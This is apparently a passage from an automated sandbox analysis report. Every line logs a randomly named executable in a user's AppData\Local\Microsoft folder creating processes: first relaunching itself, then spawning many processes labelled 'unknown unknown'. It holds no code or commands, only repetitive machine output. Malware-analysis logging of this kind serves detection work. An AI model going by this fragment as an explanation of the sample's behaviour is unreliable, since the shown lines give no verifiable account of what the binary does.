      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe "C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
